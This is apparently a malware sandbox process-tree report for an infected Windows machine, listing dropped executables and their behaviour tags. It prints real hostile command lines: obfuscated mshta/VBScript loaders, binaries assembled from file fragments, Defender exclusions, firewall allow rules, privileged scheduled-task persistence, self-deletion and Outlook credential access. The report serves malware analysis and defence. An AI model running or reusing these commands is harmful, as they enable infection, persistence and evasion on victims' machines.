C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2572 /prefetch:15⤵
- Checks computer location settings
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2964 /prefetch:25⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --mojo-platform-channel-handle=1652 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --mojo-platform-channel-handle=3416 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --mojo-platform-channel-handle=2660 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --mojo-platform-channel-handle=3332 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --mojo-platform-channel-handle=3536 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --mojo-platform-channel-handle=2652 /prefetch:85⤵
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\n6LyyW6Y130rISPizyLnNBN_.exe"C:\Users\Admin\Pictures\Adobe Films\n6LyyW6Y130rISPizyLnNBN_.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\9NDwiPlZEEhDGlkz9gl0UQAX.exe"C:\Users\Admin\Pictures\Adobe Films\9NDwiPlZEEhDGlkz9gl0UQAX.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\9NDwiPlZEEhDGlkz9gl0UQAX.exe"C:\Users\Admin\Pictures\Adobe Films\9NDwiPlZEEhDGlkz9gl0UQAX.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Accesses Microsoft Outlook accounts
- Accesses Microsoft Outlook profiles
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Pictures\Adobe Films\9NDwiPlZEEhDGlkz9gl0UQAX.exe"4⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK5⤵
- Delays execution with timeout.exe
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Ul6PF7ORyqCzK3rFPRAWHREO.exe"C:\Users\Admin\Pictures\Adobe Films\Ul6PF7ORyqCzK3rFPRAWHREO.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\Ul6PF7ORyqCzK3rFPRAWHREO.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\Ul6PF7ORyqCzK3rFPRAWHREO.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\Ul6PF7ORyqCzK3rFPRAWHREO.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\Ul6PF7ORyqCzK3rFPRAWHREO.exe" ) do taskkill -im "%~NxK" -F4⤵
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F7⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ( "WSCRIPt.SheLl" ). rUn ( "C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " , 0 , TruE ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "8⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"8⤵
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY8⤵
- Loads dropped DLL
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "Ul6PF7ORyqCzK3rFPRAWHREO.exe" -F5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\exJBBJ57RhMwfX6V7rNCirtY.exe"C:\Users\Admin\Pictures\Adobe Films\exJBBJ57RhMwfX6V7rNCirtY.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\nyj61S0T9w.bat"3⤵
-
C:\Windows\SysWOW64\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:24⤵
-
C:\Windows\System32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:25⤵
-
-
-
C:\Recovery\WindowsRE\ShellExperienceHost.exe"C:\Recovery\WindowsRE\ShellExperienceHost.exe"4⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: GetForegroundWindowSpam
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\NvFMn_zIjzcOhCOAYPNfV55o.exe"C:\Users\Admin\Pictures\Adobe Films\NvFMn_zIjzcOhCOAYPNfV55o.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\NvFMn_zIjzcOhCOAYPNfV55o.exe"C:\Users\Admin\Pictures\Adobe Films\NvFMn_zIjzcOhCOAYPNfV55o.exe"3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\NvFMn_zIjzcOhCOAYPNfV55o.exe"C:\Users\Admin\Pictures\Adobe Films\NvFMn_zIjzcOhCOAYPNfV55o.exe"3⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\Pictures\Adobe Films\1hlySlP9nisX71mJnP5mZ3Qa.exe"C:\Users\Admin\Pictures\Adobe Films\1hlySlP9nisX71mJnP5mZ3Qa.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\Pictures\Adobe Films\kMqKKP_wvgeIt3GAmkhy0_7l.exe"C:\Users\Admin\Pictures\Adobe Films\kMqKKP_wvgeIt3GAmkhy0_7l.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\EWVAtHTOXdt0DAYRA3GEQBur.exe"C:\Users\Admin\Pictures\Adobe Films\EWVAtHTOXdt0DAYRA3GEQBur.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 300 -s 6563⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 300 -s 6683⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 300 -s 6723⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 300 -s 8123⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 300 -s 10483⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 300 -s 11403⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ZuWzpISe9wfUgG8mQ9ORonH1.exe"C:\Users\Admin\Pictures\Adobe Films\ZuWzpISe9wfUgG8mQ9ORonH1.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\YLPxR1bFWYWLGzK0QEMH4Yaa.exe"C:\Users\Admin\Pictures\Adobe Films\YLPxR1bFWYWLGzK0QEMH4Yaa.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\3⤵
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM3⤵
- Creates scheduled task(s)
-
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\4⤵
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\EF78.exeC:\Users\Admin\AppData\Local\Temp\EF78.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\EF78.exeC:\Users\Admin\AppData\Local\Temp\EF78.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "_eKJw2OFuLijigALN0RShv0q" /sc ONLOGON /tr "'C:\Windows\Tasks\_eKJw2OFuLijigALN0RShv0q.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RqcBdtquQCGLaKIMXJSNd_ZL" /sc ONLOGON /tr "'C:\odt\RqcBdtquQCGLaKIMXJSNd_ZL.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "aoWnOtt3BnvpIQ5LuYSMKmgs.tmp" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\aoWnOtt3BnvpIQ5LuYSMKmgs.tmp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "9NDwiPlZEEhDGlkz9gl0UQAX" /sc ONLOGON /tr "'C:\Users\Admin\Pictures\Adobe Films\FmIprFPSFzOTXlcTeprUC6YU\9NDwiPlZEEhDGlkz9gl0UQAX.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\ShellExperienceHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "aoWnOtt3BnvpIQ5LuYSMKmgs.tmp" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\is-KM2OK.tmp\aoWnOtt3BnvpIQ5LuYSMKmgs.tmp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Users\Admin\AppData\Local\Temp\142D.exeC:\Users\Admin\AppData\Local\Temp\142D.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\3E6B.exeC:\Users\Admin\AppData\Local\Temp\3E6B.exe1⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\727C.exeC:\Users\Admin\AppData\Local\Temp\727C.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\727C.exeC:\Users\Admin\AppData\Local\Temp\727C.exe2⤵
- Loads dropped DLL
- Accesses Microsoft Outlook accounts
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\727C.exe"3⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK4⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\945D.exeC:\Users\Admin\AppData\Local\Temp\945D.exe1⤵
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\C36D.dll1⤵
-
C:\Windows\SysWOW64\regsvr32.exe/s C:\Users\Admin\AppData\Local\Temp\C36D.dll2⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe3⤵
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn ddqdlcbnv /tr "regsvr32.exe -s \"C:\Users\Admin\AppData\Local\Temp\C36D.dll\"" /SC ONCE /Z /ST 10:46 /ET 10:584⤵
- Creates scheduled task(s)
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\D725.exeC:\Users\Admin\AppData\Local\Temp\D725.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\D725.exeC:\Users\Admin\AppData\Local\Temp\D725.exe2⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\6c23d4af-d2da-4874-8eaf-fee9dbb64da5" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
-
-
C:\Users\Admin\AppData\Local\Temp\D725.exe"C:\Users\Admin\AppData\Local\Temp\D725.exe" --Admin IsNotAutoStart IsNotTask3⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\D725.exe"C:\Users\Admin\AppData\Local\Temp\D725.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Modifies extensions of user files
-
C:\Users\Admin\AppData\Local\dacfdfbb-1f67-4b50-9a15-c70fdcf65521\build3.exe"C:\Users\Admin\AppData\Local\dacfdfbb-1f67-4b50-9a15-c70fdcf65521\build3.exe"5⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\dacfdfbb-1f67-4b50-9a15-c70fdcf65521\build3.exe"C:\Users\Admin\AppData\Local\dacfdfbb-1f67-4b50-9a15-c70fdcf65521\build3.exe"6⤵
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"7⤵
- Creates scheduled task(s)
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10A4.exeC:\Users\Admin\AppData\Local\Temp\10A4.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\new.exe"C:\Users\Admin\AppData\Local\Temp\new.exe" -update "10A4.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\10A4.exe"C:\Users\Admin\AppData\Local\Temp\10A4.exe" -updated3⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Absolute\module.exe"C:\Users\Admin\AppData\Roaming\Absolute\module.exe"4⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\new.exe"3⤵
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30004⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2084.exeC:\Users\Admin\AppData\Local\Temp\2084.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\32E4.exeC:\Users\Admin\AppData\Local\Temp\32E4.exe1⤵
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 32E4.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\32E4.exe" & del C:\ProgramData\*.dll & exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 32E4.exe /f3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
-
-
-
C:\Users\Admin\AppData\Local\Temp\4F56.exeC:\Users\Admin\AppData\Local\Temp\4F56.exe1⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscRipt: cLose( CReAtEOBJECT ( "WsCrIPT.sHell" ).rUn ( "cmD.ExE /R TYPe ""C:\Users\Admin\AppData\Local\Temp\4F56.exe"" > ..\JKadlCLvM2SRA2.ExE && staRt ..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw & IF """" =="""" for %q in (""C:\Users\Admin\AppData\Local\Temp\4F56.exe"") do taskkill -iM ""%~Nxq"" -f " , 0 , truE ) )2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R TYPe "C:\Users\Admin\AppData\Local\Temp\4F56.exe"> ..\JKadlCLvM2SRA2.ExE && staRt ..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw& IF "" =="" for %q in ("C:\Users\Admin\AppData\Local\Temp\4F56.exe") do taskkill -iM "%~Nxq" -f3⤵
-
C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw4⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscRipt: cLose( CReAtEOBJECT ( "WsCrIPT.sHell" ).rUn ( "cmD.ExE /R TYPe ""C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE"" > ..\JKadlCLvM2SRA2.ExE && staRt ..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw & IF ""/PvqsV6~7fsyUR14GhQkS4jjgPQTPw"" =="""" for %q in (""C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE"") do taskkill -iM ""%~Nxq"" -f " , 0 , truE ) )5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R TYPe "C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE"> ..\JKadlCLvM2SRA2.ExE && staRt ..\JKadLCLVm2SRA2.eXe /PvqsV6~7fsyUR14GhQkS4jjgPQTPw& IF "/PvqsV6~7fsyUR14GhQkS4jjgPQTPw" =="" for %q in ("C:\Users\Admin\AppData\Local\Temp\JKadlCLvM2SRA2.ExE") do taskkill -iM "%~Nxq" -f6⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCripT: ClOSe ( creAteObJecT ( "WscrIpT.sheLl" ). RUN ( "cmd /q /c ECho %tImE%4u> VDn3614.Q9 & ECho | SET /p = ""MZ"" > WSyZI.4 & coPY /b /y WSYZI.4 + 0CPM7.G + TY6DSS.SE + vDN3614.Q9 ..\UfTh.2~z & STaRt msiexec -y ..\UFTH.2~Z & deL /q * " , 0 , tRUe ) )5⤵
-
